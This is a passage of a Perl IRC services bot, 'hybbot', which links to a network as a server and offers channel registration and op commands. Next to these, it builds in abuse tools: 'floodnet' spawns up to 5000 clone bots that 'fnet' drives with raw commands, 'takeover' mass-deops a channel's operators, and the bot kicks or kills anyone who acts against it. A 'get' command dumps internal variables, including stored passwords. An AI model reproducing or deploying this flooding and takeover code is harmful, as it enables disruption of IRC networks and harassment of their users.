- # <pass> massdopz0r <#chans> <nick>
- # <pass> adduser <nick> <id> <pass>
- # <pass> raw <raw irc commands>
- # <pass> m0pz0r <#chan>
- #
- # l33t hax0rs:
- # <pass> exit <quit message>
- # <pass> floodnet <# of bots> <name of net> [nick]
- # <pass> fnet <name of net> <raw commands>
- # <pass> killnet <name of net> [quit message]
- # <pass> restart [exit message]
- # <pass> takeover <#chan> <nicks>
- # <pass> addoper <nick> <id>
- # <pass> retrieve <raw irc command>
- # <pass> get <variable name>
- #
- # Info on users and channels:
- # $nix{$a}{$b}
- # $a = nick of anyone on network
- # $b = chans that nick is in
- # $all{$a}{$b}
- # $a = chans with people in them
- # $b = nicks of people in chan
- # $sall{$a}{$b}
- # $a = chans with people in them
- # $b = nicks of people in chan but the nick
- # may include a '@' or '+' in front of it
- $conf = "hybbot.conf";
- $joinz0r = 1;
- $SIG{'HUP'} = \&rehash;
- $version = "0.8";
- use Socket;
- unless (@ARGV == 5) {
- die "usage: $0 <nick[,nick2,nick3,etc]> <hub server [to connect to]> <hybbot server> <server password> <hostname[,hostname2,hostname3,etc]>\n";
- }
- defined ($fork = fork()) || print STDERR "Unable to fork...\n";
- ($fork) && die "hybbot actived on PID $fork\n";
- &rehash;
- $remote = $ARGV[1];
- $port = 6667;
- @nickss = split(/,/, $ARGV[0]);
- @hosts = split(/,/, $ARGV[4]);
- $host = shift(@hosts);
- $botnick = shift(@nickss);
- $iaddr = inet_aton($remote);
- $paddr = sockaddr_in($port, $iaddr);
- $proto = getprotobyname('tcp');
- socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Cannot create socket\n";
- connect(SOCK, $paddr) || die "Unable to connect\n";
- select(SOCK);
- $| = 1;
- select('stdout');
- $srvc = $ARGV[2];
- print SOCK "PASS $ARGV[3] :TS\n";
- print SOCK "SERVER $ARGV[2] 1 :Services - hybbot [irc.LucidX.com]\n";
- $tmp = "NICK $botnick 1 1 +noKNbcdfikrswxyzO $botnick $host $ARGV[2] :hybbot by CommPort5[\@LucidX.com] - samy (Service bot)";
- print SOCK "$tmp\n";
- $bots{$botnick} = $tmp;
- for ($i = 0; $i < @nickss; $i++) {
- $tmp = "NICK $nickss[$i] 1 1 +iw $nickss[$i] $hosts[$i] $ARGV[2] :hybbot by CommPort5[\@LucidX.com] - samy (Service bot)";
- print SOCK "$tmp\n";
- $bots{$nickss[$i]} = $tmp;
- }
- if ($joinz0r) {
- foreach $tmpc (keys(%join)) {
- foreach (keys(%{$join{$tmpc}})) {
- print SOCK "SJOIN ts $tmpc + :\@$botnick\n";
- print SOCK ":$botnick MODE $tmpc $_\n";
- $chans{$tmpc} = 1;
- }
- }
- }
- while (<SOCK>) {
- $blargh = $_;
- $blargh =~ s/-insecure//;
- ($fulladd, $what, $where, $etc) = $_ =~ /^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$/;
- $fulladd =~ s/-insecure//;
- ($nic) = $fulladd =~ /^:(.*)$/;
- $nick = lc($nic);
- $where = lc($where);
- # part of the retrieve command
- if ($retr) {
- print SOCK ":$botnick PRIVMSG $retr :$_\n";
- $retr = 0;
- }
- # return server pings
- if (/^PING (.*)$/) {
- print SOCK "PONG $1\n";
- next;
- }
- # autokick people who kick me!
- elsif (/^:(\S+) KICK (\S+) (\S+)/ && ($bots{$3} || $protect{$3})) {
- if ($bots{$3}) {
- print SOCK "SJOIN ts $2 + :\@$3\n";
- print SOCK "KICK $2 $1 :right back at you.\n";
- delete($nix{$1}{$2});
- delete($all{$2}{$1});
- delete($sall{$2}{$1});
- delete($sall{$2}{'@' . $1});
- next;
- }
- else {
- print SOCK "KICK $2 $1 :you mess with him, you mess with me.\n";
- delete($nix{$1}{$2});
- delete($all{$2}{$1});
- delete($sall{$2}{$1});
- delete($sall{$2}{'@' . $1});
- next;
- }
- next;
- }
- # autodeop people who deop me!
- if (/^:(\S+) MODE (\S+) -+o+ (.*)$/) {
- @tmpb = split(/\s+/, $3);
- foreach (@tmpb) {
- if (($bots{$_} || $protect{$_}) && !($bots{$1} || $protect{$1})) {
- print SOCK ":$_ PART $2\nSJOIN ts $2 + :\@$_\n";
- print SOCK ":$_ MODE $2 -o $1\n";
- delete $sall{$2}{'@' . $_};
- $sall{$a}{$_} = 1;
- last;
- }
- }
- }
- # autokill people who kill me!
- elsif (/^:(\S+) KILL (\S+)/ && ($botnick eq $2 || $protect{$2})) {
- if ($bots{$2}) {
- print SOCK "KILL $1 :Please do not kill services. (-hybbot)\n$bots{$2}\n";
- foreach (keys(%chans)) {
- print SOCK "SJOIN ts $_ + :\@$2\n";
- }
- foreach (keys(%{$nix{$1}})) {
- delete($all{$_}{$1});
- delete($sall{$_}{'@' . $1});
- delete($sall{$_}{$1});
- }
- delete($nix{$a});
- next;
- }
- else {
- print SOCK "KILL $1 :You mess with my family, you mess with me. -$botnick [hybbot]\n";
- for (keys(%{$nix{$1}})) {
- delete($all{$_}{$1});
- delete($sall{$_}{'@' . $1});
- delete($sall{$_}{$1});
- }
- delete($nix{$a});
- next;
- }
- }
- # add/remove/modify the arrays with the names of everyone in chans
- if (/^:(\S+)!\S+\s+PART\s+(\S+)/) {
- ($a, $b) = (lc($1), lc($2));
- delete $nix{$a}{$b};
- delete $all{$b}{$a};
- delete $sall{$b}{$a};
- delete $sall{$b}{'@' . $a};
- next;
- }
- if (/^:\S+\s+KICK\s+(\S+)\s+(\S+)/) {
- ($b, $a) = (lc($1), lc($2));
- delete $nix{$a}{$b};
- delete $all{$b}{$a};
- delete $sall{$b}{$a};
- delete $sall{$b}{'@' . $a};
- next;
- }
- if (/^:(\S+)!\S+\s+JOIN\s+:(.*)$/) {
- ($a, $b) = (lc($1), lc($2));
- $nix{$a}{$b} = 1;
- $all{$b}{$a} = 1;
- $sall{$b}{$a} = 1;
- next;
- }
- if (/^:(\S+)!\S+\s+NICK\s+:(\S+)/) {
- ($a, $b) = (lc($1), lc($2));
- foreach (@{$nix{$a}}) {
- delete $all{$_}{$a};
- if (delete($sall{$_}{$a})) {
- $sall{$_}{$b} = 1;
- }
- if (delete($sall{$_}{'@' . $a})) {
- $sall{$_}{'@' . $b} = 1;
- }
- $all{$_}{$b} = 1;
- }
- $nix{$a} = $nix{$b};
- delete $nix{$a};
- }
- if (/^:\S+\s+MODE\s+(\S+)\s+(-|\+)o+\s+(.*)$/) {
- ($a, $b, $c) = (lc($1), $2, lc($3));
- @tmp = split(/\s+/, $c);
- foreach (@tmp) {
- if ($b eq '-') {
- delete $sall{$a}{'@' . $_};
- $sall{$a}{$_} = 1;
- }
- if ($b eq '+') {
- delete $sall{$a}{$_};
- $sall{$a}{'@' . $_} = 1;
- }
- }
- next;
- }
- if (/^:(\S+)!\S+\s+QUIT/) {
- ($a) = (lc($1));
- foreach (@{$nix{$a}}) {
- delete $all{$_}{$a};
- delete $sall{$_}{$a};
- delete $sall{$_}{'@' . $a};
- }
- delete $nix{$a};
- next;
- }
- if (/^:\S+\s+SJOIN\s+\S+\s+(\S+)\s+([^:]+)\s+:(.*)$/) {
- $tmpr = lc($1);
- $chns{$tmpr} = $2;
- @tmp = split(/\s+/, lc($3));
- foreach (@tmp) {
- s/\+//;
- $sall{$tmpr}{$_} = 1;
- s/\@//;
- $all{$tmpr}{$_} = 1;
- $nix{$_}{$tmpr} = 1;
- }
- next;
- }
- # help finish the registration of a channel
- elsif ($what == 319 && $regchan) {
- ($chan) = $etc =~ /:(.*)$/;
- @chans = split(/\s+/, $chan);
- foreach (@chans) {
- if ($_ eq "\@" . lc($hash{'chan'}) && !&checkconf(lc($hash{'chan'}))) {
- $pass = &mkpasswd($hash{'pass'});
- &addconf("CHAN:".lc($hash{'chan'}).":$hash{'nick'}:$pass\n");
- print SOCK ":$botnick PRIVMSG $hash{'nick'} :\cb$hash{'chan'} registered by $hash{'nick'} (password: $hash{'pass'})\n";
- print SOCK ":$botnick PRIVMSG $hash{'nick'} :Use the OP command to gain ops from me.\n";
- print SOCK ":$botnick PART $hash{'chan'}\n";
- $rg++;
- }
- }
- if (!$rg) {
- print SOCK ":$botnick PRIVMSG $hash{'nick'} :Unable to register $hash{'chan'} (not opped?)\n";
- print SOCK ":$botnick PART $hash{'chan'}\n";
- }
- undef $rg;
- undef %hash;
- undef $regchan;
- $chnln{$hash{'chan'}} = $hash{'nick'};
- $chnlp{$hash{'chan'}} = $pass;
- next;
- }
- ###########################################
- # Private messages and all
- ###########################################
- elsif ($where !~ /^#/ and $what eq 'PRIVMSG') {
- # getting info about commands
- if ($etc =~ /^:botpart\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botpart <botnick> <#chan>\cb\n";
- next;
- }
- elsif ($etc =~ /^:botop\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botop <botnick> <#chan> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:botdeop\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botdeop <botnick> <#chan> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:takeover\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> takeover <#chan> <nicks>\n";
- next;
- }
- elsif ($etc =~ /^:floodnet\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> floodnet <# of bots> <name of net> [nick]\n";
- next;
- }
- elsif ($etc =~ /^:fnet\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> fnet <name of net> <raw commands>\n";
- next;
- }
- elsif ($etc =~ /^:killnet\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> killnet <name of net> [quit message]\n";
- next;
- }
- elsif ($etc =~ /^:adduser\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> adduser <nick> <id> <passwd>\n";
- next;
- }
- elsif ($etc =~ /^:addbot\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> addbot <botnick> <flags> <hostname> <ircname>\cb\n";
- next;
- }
- elsif ($etc =~ /^:killbot\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> killbot <botnick> [message]\cb\n";
- next;
- }
- elsif ($etc =~ /^:botjoin\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botjoin <botnick> <#chan>\cb\n";
- next;
- }
- elsif ($etc =~ /^:addjoin\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> addjoin <#chan> [nick]\cb\n";
- next;
- }
- elsif ($etc =~ /^:op\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: op <#channel> <password> [nick (originally reged chan with)]\cb\n";
- next;
- }
- elsif ($etc =~ /^:invite\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: invite <#channel> <password> [nick]\cb\n";
- next;
- }
- elsif ($etc =~ /^:addchan\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: addchan <#channel> <password> [modes]\cb\n";
- next;
- }
- elsif ($etc =~ /^:chmodes\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: chmodes <#channel> <newmodes>\cb\n";
- next;
- }
- elsif ($etc =~ /^:delchan\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: delchan <#channel> <password>\cb\n";
- next;
- }
- elsif ($etc =~ /^:permmode\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: permmode <#channel> <password> <modes>\cb\n";
- next;
- }
- elsif ($etc =~ /^:addop\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: addop <#channel> <password> <nick>\cb (the nick must have already set a password with the pass command)\n";
- next;
- }
- elsif ($etc =~ /^:addaop\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: addaop <#channel> <password> <nick!ident\@hostname>\cb\n";
- next;
- }
- elsif ($etc =~ /^:delop\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: delop <#channel> <password> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:opz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> opz0r <#chan> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:restart\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> restart [exit message]\cb\n";
- next;
- }
- elsif ($etc =~ /^:exit\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> exit [exit message]\cb\n";
- next;
- }
- elsif ($etc =~ /^:deopz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> deopz0r <#chan> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:joinz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> joinz0r <#chans>\cb\n";
- next;
- }
- elsif ($etc =~ /^:mode\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: mode <password> <#channel> <modes>\cb\n";
- next;
- }
- elsif ($etc =~ /^:register\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: register <#channel> <password>\cb\n";
- next;
- }
- elsif ($etc =~ /^:raw\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> raw <raw irc stuff;more irc stuff>\cb\n";
- next;
- }
- elsif ($etc =~ /^:m0pz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> m0pz0r <#chans>\cb\n";
- next;
- }
- elsif ($etc =~ /^:massopz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> massopz0r <#chans> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:massdopz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> massdopz0r <#chans> <nick>\cb\n";
- next;
- }
- elsif ($etc =~ /^:partz0r\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> partz0r <#chans>\cb\n";
- next;
- }
- elsif ($etc =~ /^:help\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :Please type \cb/msg $botnick USERHELP\cb. If you're an OPER, type \cb/msg $botnick OPERHELP\cb.\n";
- next;
- }
- elsif ($etc =~ /^:retrieve\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> retrieve <raw irc command>\n";
- next;
- }
- elsif ($etc =~ /^:get\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> get <variable name>\n";
- next;
- }
- elsif ($etc =~ /^:addoper\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> addoper <nick> <id>\n";
- next;
- }
- # get the user commands
- elsif ($etc =~ /^:userhelp\s*$/i) {
- print SOCK ":$botnick PRIVMSG $nick :Commands: register, mode, op, pass, status, invite, addchan, delchan, chmodes, addop, delop, addaop - /msg $botnick command for more information on a specific command.\n";
- next;
- }
- # setting a password
- elsif ($etc =~ /^:pass\s+(.*)\s*$/i || $etc =~ /:pass\s*$/i) {
- $nu = $1;
- $nu =~ s/\s*$//;
- if ($nu) {
- if ($nu =~ /\s/) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: PASS <password>\cb\n";
- }
- else {
- if (&checkpass($nick)) {
- print SOCK ":$botnick PRIVMSG $nick :You already have a password set.\n";
- }
- else {
- print SOCK "WHOIS $nick\n";
- $passval = 1;
- $pas = &mkpasswd($nu);
- &addconf("PASS:" . $nick . ":0:0:$pas\n");
- $passes{$nick} = $pas;
- print SOCK ":$botnick PRIVMSG $nickx :Password $nu added\n";
- }
- }
- }
- else {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: PASS <password>\cb\n";
- }
- next;
- }
- # mess with anyone who ctcp versions me
- elsif ($etc =~ /^:\caversion/i) {
- foreach (@{$bnx{"h4w"}}) {
- print SOCK ":$_ NOTICE $nick :\cAVERSION \cBhybbot $version\cB by CommPort5\cA\n";
- }
- next;
- }
- # get status of yourself
- elsif ($etc =~ /^:status/i) {
- $stat = &status($nick);
- print SOCK ":$botnick PRIVMSG $nick :Your status is: \cb$stat\cb\n";
- next;
- }
- # get the oper commands
- elsif ($etc =~ /^:operhelp/i) {
- print SOCK ":$botnick PRIVMSG $nick :\cbwannabes:\cb opz0r\n";
- print SOCK ":$botnick PRIVMSG $nick :\cbopers:\cb rehash, opz0r, deopz0r, joinz0r, partz0r\cb\n";
- print SOCK ":$botnick PRIVMSG $nick :\cbhax0rs:\cb m0pz0r, raw, adduser, addjoin, botjoin, botpart, botop, botdeop, addbot, killbot, listbots, massopz0r, massdopz0r\n";
- print SOCK ":$botnick PRIVMSG $nick :\cbl33t hax0rs:\cb get, retrieve, addoper, exit, restart, floodnet, killnet, fnet, takeover\n";
- next;
- }
- # addop command
- elsif ($etc =~ /^:addop\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
- ($chan, $pass, $nck) = ($1, $2, $3);
- $chan = lc($chan);
- $nck = lc($nck);
- if (!&chkline("CHOP:$chan:$nck:") && $passes{$nck} && ((&ckpasswd($pass, $chnlp{$chan}) && $chnln{$chan} eq $nick) || (&ckpasswd($pass, $passes{$nick}) && $nicks{$nick} >= 31337))) {
- &addop($nck, $chan);
- print SOCK ":$botnick PRIVMSG $nick :\cb$nck was added as an op for $chan\cb\n";
- print SOCK ":$botnick PRIVMSG $nck :You've been added as an op for $chan, /msg $botnick OP for help on opping yourself\n";
- }
- elsif (&chkline("CHOP:$chan:$nck:")) {
- print SOCK ":$botnick PRIVMSG $nick :$nck is already in the conf\n";
- }
- elsif ($chnln{$chan} ne $nick) {
- print SOCK ":$botnick PRIVMSG $nick :You don't own $chan [$chnln{$chan} != $nick]\n";
- }
- elsif (!&ckpasswd($pass, $chnlp{$chan})) {
- print SOCK ":$botnick PRIVMSG $nick :Incorrect password.\n";
- }
- next;
- }
- # delop command (under construction)
- elsif ($etc =~ /^:delop\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
- next;
- }
- # invite command
- elsif ($etc =~ /^:invite\s+(\S+)\s+(\S+)\s*(\S*)/i) {
- $onick = $nick;
- $onick = $3 if $3;
- if (&readconf("CHAN:".lc($1).":$onick:", $2) || &readconf("CHOP:".lc($1).":$onick:", $2)) {
- print SOCK "SJOIN ts $1 + :\@$botnick\n" if (!$chans{lc($1)});
- print SOCK ":$botnick INVITE $nick $1\n";
- print SOCK ":$botnick PART $1\n" if (!$chans{lc($1)});
- }
- else {
- print SOCK ":$botnick PRIVMSG $nick :Incorrect password or nickname.\n";
- }
- next;
- }
- # addchan command
- =pod
- elsif ($etc =~ /^:addchan\s+(\S+)\s*(.*)$/i) {
- # if (&
- if ($chans{lc($1)}) {
- print SOCK ":$botnick PRIVMSG $nick :Channel is already in the conf.\n";
- }
- else {
- print SOCK "SJOIN ts $1 + :\@$botnick\n" unless $chans{$1};
- &addconf("JOIN:" . lc($1) . ":$2:\n");
- $chans{lc($1)}{$2} = 1;
- }
- next;
- }
- =cut
- # op command
- elsif ($etc =~ /^:op\s+(\S+\s+\S+)\s*(\S*)/i) {
- $onick = $nick;
- $nick = $2 if $2;
- @reg = split(/\s+/, $1);
- if (&readconf("CHAN:".lc($reg[0]).":$nick:", $reg[1]) || &readconf("CHOP:".lc($reg[0]).":$nick:", $reg[1])) {
- print SOCK "SJOIN ts $reg[0] + :\@$botnick\n" if (!$chans{lc($reg[0])});
- print SOCK ":$botnick MODE $reg[0] +o $onick\n";
- print SOCK ":$botnick PART $reg[0]\n" if (!$chans{lc($reg[0])});
- delete $sall{lc($reg[0])}{$onick};
- $sall{$1}{'@' . $onick} = 1;
- }
- else {
- print SOCK ":$botnick PRIVMSG $onick :Incorrect password or nickname.\n";
- }
- next;
- }
- # mode command
- elsif ($etc =~ /^:mode\s+(\S+)\s+(\S+)\s+(.*)$/i) {
- if (&readconf("CHAN:".lc($2).":$nick:", $1)) {
- print SOCK "SJOIN ts $2 + :\@$botnick\n" if (!$chans{lc($2)});
- print SOCK ":$botnick MODE $2 $3\n";
- print SOCK ":$botnick PART $2\n" if (!$chans{lc($2)});
- }
- else {
- print SOCK ":$botnick PRIVMSG $onick :Incorrect password or nickname.\n";
- }
- next;
- }
- # register command
- elsif ($etc =~ /^:register\s+(\S+\s+\S+)/i) {
- @reg = split(/\s+/, $1);
- if (&checkconf($reg[0]) || $reg[0] !~ /^#/) {
- print SOCK ":$botnick PRIVMSG $nick :$reg[0] is already registered.\n";
- }
- elsif ($reg[0] !~ /^#/) {
- print SOCK ":$botnick PRIVMSG $nick :\cbusage: register <#channel> <password>\cb\n";
- }
- else {
- print SOCK ":$botnick JOIN $reg[0]\n:$botnick WHOIS $nick\n";
- $hash{'chan'} = $reg[0];
- $hash{'nick'} = $nick;
- $hash{'pass'} = $reg[1];
- $regchan = 1;
- }
- next;
- }
- # oper stuff
- elsif ($etc =~ /^:(\S+)/ && &ckpasswd($1, $passes{$nick})) {
- $etc =~ s/^\S+\s+/:/;
- # opz0r for wannabes
- if ($etc =~ /^:opz0r\s+(\S+)\s+(\S+)/i && $nicks{$nick} == 0) {
- if ($chans{$1}) {
- print SOCK ":$botnick MODE $1 +o $2\n";
- }
- else {
- print SOCK "SJOIN ts $1 + :\@$botnick\n:$botnick MODE $1 +o $2\n:$botnick PART $1\n";
- }
- delete $sall{$1}{$2};
- $sall{$1}{'@' . $2} = 1;
- next;
- }
- # l33t hax0r commands
- if ($nicks{$nick} >= 31337) {
- # takeover command :)
- if ($etc =~ /^:takeover\s+(\S+)\s+(.*)$/i) {
- ($chn, $oth) = ($1, $2);
- $chn = lc($chn);
- @nms = keys(%{$sall{$chn}});
- my (%tmp0r, @nns, $snd, $f);
- @othr = split(/\s+/, $oth);
- foreach (@othr) {
- $tmp0r{$_}++;
- }
- foreach (@nms) {
- push(@nns, $_) if (s/^\@// && !$tmp0r{$_});
- }
- print SOCK "SJOIN ts $chn + :\@$botnick\n" if (!$chans{lc($chn)});
- foreach (0 .. @nns) {
- $f++;
- delete $sall{$chn}{'@' . lc($nns[0])};
- $sall{$chn}{lc($nns[0])} = 1;
- $snd .= "$nns[$_] ";
- if ($f == 12) {
- $f = 0;
- print SOCK ":$botnick MODE $chn " . "-" x 13 . "o" x 13 . " $snd\n";
- $snd = "";
- }
- }
- print SOCK ":$botnick MODE $chn " . "-" x 13 . "o" x 13 . " $snd\n";
- ($snd, $f) = ("", "");
- foreach (0 .. @othr) {
- $f++;
- delete $sall{$chn}{lc($othr[$_])};
- $sall{$chn}{'@' . lc($othr[$_])} = 1;
- $snd .= "$othr[$_] ";
- if ($f == 12) {
- $f = 0;
- print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
- $snd = "";
- }
- }
- print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
- print SOCK ":$botnick PART $chn\n" if (!$chans{lc($chn)});
- next;
- }
- # floodnet command
- elsif ($etc =~ /^:floodnet\s+(\S+)\s+(\S+)\s*(\S*)$/i) {
- if (($1 + $fnts) >= 5000) {
- print SOCK ":$botnick PRIVMSG $nick :There cannot be over 5000 bots (currently there are $fnts loaded)\n";
- }
- elsif ($nets{$2}) {
- print SOCK ":$botnick PRIVMSG $nick :There already is a net with that name.\n";
- }
- else {
- $nets{$2} = $1;
- $fnts += $1;
- $x = 0;
- for (1 .. $1) {
- $x++;
- my $nck;
- if ($3) {
- $nck = $3 . int(rand(1000));
- push(@{$bnx{$2}}, $nck);
- }
- else {
- @tmp = ('a' .. 'z');
- for (1 .. 9) {
- $nck .= $tmp[int(rand(@tmp))];
- }
- push(@{$bnx{$2}}, $nck);
- }
- print SOCK "NICK $nck 1 1 +iw $nck hyb.bot $srvc :hybbot [floodbot]\n";
- if ($x == 200) {
- $x = 0;
- sleep 1;
- }
- }
- }
- }
- # killnet command
- elsif ($etc =~ /^:killnet\s+(\S+)\s*(\S*)$/i) {
- $x = 0;
- $fnts -= $nets{$1};
- delete $nets{$1};
- foreach $bn (@{$bnx{$1}}) {
- $x++;
- print SOCK ":$bn QUIT :$2\n";
- if ($x == 200) {
- $x = 0;
- sleep 1;
- }
- }
- }
- # fnet command
- elsif ($etc =~ /^:fnet\s+(\S+)\s+(.*)$/i) {
- @cmds = split(/;/, $2);
- $x = 0;
- foreach $cmd (@cmds) {
- foreach $bn (@{$bnx{$1}}) {
- $x++;
- $tmp = $cmd;
- $tmp =~ s/\\\*/$bn/g;
- print SOCK "$tmp\n";
- if ($x == 200) {
- sleep 1;
- $x = 0;
- }
- }
- }
- }
- # retrieve command
- elsif ($etc =~ /^:retrieve\s*(.*)$/i) {
- print SOCK "$1\n";
- $retr = $nick;
- next;
- }
- # get command
- elsif ($etc =~ /^:get\s*(.*)$/i) {
- ($a) = ($1);
- @b = split(/\s+/, $a);
- if (@b == 1) {
- $c = ${$a};
- }
- elsif (@b == 2) {
- $c = ${$b[0]}{$b[1]};
- }
- else {
- $c = ${$b[0]}{$b[1]}{$b[2]};
- }
- print SOCK ":$botnick PRIVMSG $nick :$c\n";
- if (@b == 1) {
- $c = join(', ', keys(%{${$a}}));
- }
- elsif (@b == 2) {
- $c = join(', ', keys(%{${$b[0]}{$b[1]}}));
- }
- else {
- $c = join(', ', keys(%{${$b[0]}{$b[1]}{$b[2]}}));
- }
- print SOCK ":$botnick PRIVMSG $nick :$c\n";
- next;
- }
- # exit command
- elsif ($etc =~ /^:exit\s*(.*)$/i) {
- foreach (keys(%bots)) {
- print SOCK ":$_ QUIT :$1\n";
- }
- die "hybbot exiting...\n";
- }
- # restart command
- elsif ($etc =~ /^:restart\s*(.*)$/i) {
- foreach (keys(%bots)) {
- print SOCK ":$_ QUIT :$1\n";
- }
- close(SOCK);
- fork() && die "hybbot restarting...\n";
- &restart;
- }
- # addoper command
- elsif ($etc =~ /^:addoper\s+(\S+)\s+(\S+)\s*$/i) {
- if (&addoper($1, $2) == 1) {
- print SOCK ":$botnick PRIVMSG $nick :$1 added as an oper with ID $2\n";
- }
- elsif (&addoper($1, $2) == 2) {
- print SOCK ":$botnick PRIVMSG $nick :$1 is in the conf too many times.\n";
- }
- else {
- print SOCK ":$botnick PRIVMSG $nick :$1 was not found in conf.\n";
- }
- &rehash;
- next;
- }
- }
- # hax0r commands [and above]
- if ($nicks{$nick} >= 666) {
- # adduser command
- if ($etc =~ /^:adduser\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
- &operconf($1, $2, $3);
- next;
- }
- # m0pz0r command
- elsif ($etc =~ /^:m0pz0r\s+(.*)$/i) {
- @tmp = split(/\s+/, $1);
- foreach $chn (@tmp) {
- $chn = lc($chn);
- ($snd, $f) = ("", "");
- @nmz = keys(%{$all{$chn}});
- print SOCK "SJOIN ts $chn + :\@$botnick\n" if (!$chans{lc($chn)});
- foreach (0 .. @nmz) {
- $f++;
- delete $sall{$chn}{lc($nmz[$_])};
- $sall{$chn}{'@' . lc($nmz[$_])} = 1;
- $snd .= "$nmz[$_] ";
- if ($f == 12) {
- $f = 0;
- print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
- $snd = "";
- }
- }
- print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
- print SOCK ":$botnick PART $chn\n" if (!$chans{lc($chn)});
- }
- next;
- }
- # raw command
- elsif ($etc =~ /^:raw\s+(.*)$/i) {
- @tmp = split(/;/, $1);
- foreach (@tmp) {
- print SOCK "$_\n";
- }
- next;
- }
- # massopz0r command
- elsif ($etc =~ /^:massopz0r\s+(.*)$/i) {
- if ($1 =~ /^([^#]\S+)\s+(.*)$/) {
- $n = $1;
- $c = $2;
- }
- else {
- $n = $nick;
- }
- $n = lc($n);
- @chans = split(/\s/, $c);
- foreach (@chans) {
- if ($chans{$_}) {
- print SOCK ":$botnick MODE $_ +o $n\n";
- }
- else {
- print SOCK "SJOIN ts $_ + :\@$botnick\n:$botnick MODE $_ +o $n\n:$botnick PART $_\n";
- }
- delete $sall{lc($_)}{$n};
- $sall{lc($_)}{'@' . $n} = 1;
- }
- }
- # massdopz0r command
- elsif ($etc =~ /^:massdopz0r\s+(.*)$/i) {
- if ($1 =~ /^([^#]\S+)\s+(.*)$/) {
- $n = $1;
- $c = $2;
- }
- else {
- $n = $nick;
- }
- $n = lc($n);
- @chans = split(/\s/, $c);
- foreach (@chans) {
- if ($chans{$_}) {
- print SOCK ":$botnick MODE $_ -o $n\n";
- }
- else {
- print SOCK "SJOIN ts $_ + :\@$botnick\n:$botnick MODE $_ -o $n\n:$botnick PART $_\n";
- }
- delete $sall{'@' . lc($_)}{$n};
- $sall{lc($_)}{$n} = 1;
- }
- }
- # killbot command
- elsif ($etc =~ /^:killbot\s+(\S+)\s*(.*)$/i) {
- print SOCK ":$1 QUIT :$2\n";
- delete($bots{$1});
- next;
- }
- # listbots command
- elsif ($etc =~ /^:listbots/i) {
- my @temp;
- foreach (keys(%bots)) {
- if ($bots{$_}) {
- push(@temp, $_);
- }
- }
- $tmp = join(', ', @temp);
- print SOCK ":$botnick PRIVMSG $nick :$tmp\n";
- next;
- }
- # addbot command
- elsif ($etc =~ /^:addbot\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$/i) {
- $tmp = "NICK $1 1 1 $2 $1 $3 $srvc :$4";
- print SOCK "$tmp\n";
- $bots{$1} = $tmp;
- next;
- }
- # addjoin command
- elsif ($etc =~ /^:addjoin\s+(\S+)\s*(.*)$/i) {
- if ($chans{lc($1)}) {
- print SOCK ":$botnick PRIVMSG $nick :Channel is already in the conf.\n";
